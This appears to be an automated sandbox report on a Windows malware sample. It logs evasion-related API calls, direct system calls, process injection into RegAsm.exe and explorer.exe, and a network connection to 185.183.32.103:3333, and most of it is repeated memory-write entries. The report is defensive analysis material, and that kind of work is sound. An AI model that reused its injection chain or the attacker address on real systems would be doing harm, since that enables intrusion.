Source: C:\Users\user\Desktop\mQRr8Rkorf.exe Code function: 0_2_00FA202A memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,GetModuleFileNameA,LocalAlloc,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree, 0_2_00FA202A
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe Code function: 17_2_009F14C0 GetProcessHeap,__Init_thread_footer,__Init_thread_footer, 17_2_009F14C0
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe Code function: 0_2_00FA6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00FA6CF0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe Code function: 1_2_00926CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_00926CF0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe Code function: 1_2_00926F40 SetUnhandledExceptionFilter, 1_2_00926F40
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe Code function: 17_2_009F27E0 SetUnhandledExceptionFilter, 17_2_009F27E0
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe Code function: 17_2_009F2529 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 17_2_009F2529
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe Code function: 17_2_009F264A IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_009F264A
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe Code function: 17_2_6D63EEB8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 17_2_6D63EEB8
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe Code function: 17_2_6D63F27B IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_6D63F27B
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion
Source: C:\Windows\SysWOW64\explorer.exe Network Connect: 185.183.32.103 3333
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe NtQuerySystemInformation: Direct from: 0x6D6A7625
Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exe NtAllocateVirtualMemory: Direct from: 0x7FFBFA0C60D4
Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe NtQuerySystemInformation: Direct from: 0x6C8A7625
Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe NtProtectVirtualMemory: Direct from: 0x772E037F
Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exe NtClose: Direct from: 0x2A32430
Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exe NtAllocateVirtualMemory: Direct from: 0xA0A76ACB
Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exe NtWriteFile: Direct from: 0x7FFBFA0D9822
Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exe NtAllocateVirtualMemory: Direct from: 0x7FFBFA0D9635
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe NtProtectVirtualMemory: Direct from: 0x776C7B2E
Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exe NtProtectVirtualMemory: Direct from: 0x7FFBFA0D94F5
Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exe NtClose: Direct from: 0x1C
Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exe NtProtectVirtualMemory: Direct from: 0x7FFBFA0D973A
Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exe NtQuerySystemInformation: Direct from: 0x6C006C
Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe NtProtectVirtualMemory: Direct from: 0x772B8E35
Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exe NtCreateFile: Direct from: 0x7FFBFA0D97E6
Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exe NtQuerySystemInformation: Direct from: 0x7FFBFA0C6118
Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe NtQuerySystemInformation: Direct from: 0x6C597625
Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exe NtClose: Direct from: 0x7FFBFA0D982C
Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exe NtAllocateVirtualMemory: Direct from: 0x7FFBFA0D8E14
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe Memory written: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\cmd.exe Memory written: PID: 5596 base: 2779C0 value: 55
Source: C:\Windows\SysWOW64\cmd.exe Memory written: PID: 1860 base: 2779C0 value: 55
Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
Source: C:\Windows\SysWOW64\cmd.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 2779C0
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20000
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20064
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A200C8
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2012C
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20190
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A201F4
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20258
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A202BC
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20320
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20384
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A203E8
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2044C
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A204B0
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20514
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20578
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A205DC
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20640
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A206A4
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20708
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2076C
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A207D0
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20834
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20898
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A208FC
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20960
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A209C4
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20A28
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20A8C
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20AF0
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20B54
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20BB8
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20C1C
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20C80
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20CE4
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20D48
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20DAC
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20E10
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20E74
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20ED8
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20F3C
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20FA0
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21004
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21068
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A210CC
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21130
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21194
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A211F8
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2125C
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A212C0
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21324
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21388
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A213EC
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21450
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A214B4
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21518
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2157C
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A215E0
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21644
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A216A8
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2170C
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21770
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A217D4
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21838
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2189C
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21900
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21964
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A219C8
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21A2C
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21A90
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21AF4
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21B58
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21BBC
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21C20
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21C84
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21CE8
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21D4C
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21DB0
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21E14
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21E78
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21EDC
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21F40
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21FA4
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22008
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2206C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A220D0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22134
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22198
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A221FC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22260
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A222C4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22328
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2238C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A223F0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22454
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A224B8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2251C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22580
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A225E4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22648
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A226AC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22710
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22774
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A227D8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2283C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A228A0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22904
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22968
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A229CC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22A30
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22A94
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22AF8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22B5C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22BC0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22C24
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22C88
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22CEC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22D50
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22DB4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22E18
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22E7C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22EE0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22F44
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22FA8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2300C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23070
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A230D4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23138
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2319C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23200
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23264
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A232C8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2332C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23390
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A233F4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23458
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A234BC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23520
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23584
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A235E8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2364C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A236B0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23714
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23778
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A237DC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23840
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A238A4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23908
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2396C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A239D0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23A34
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23A98
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23AFC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23B60
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23BC4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23C28
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23C8C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23CF0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23D54
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23DB8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23E1C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23E80
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23EE4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23F48
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23FAC
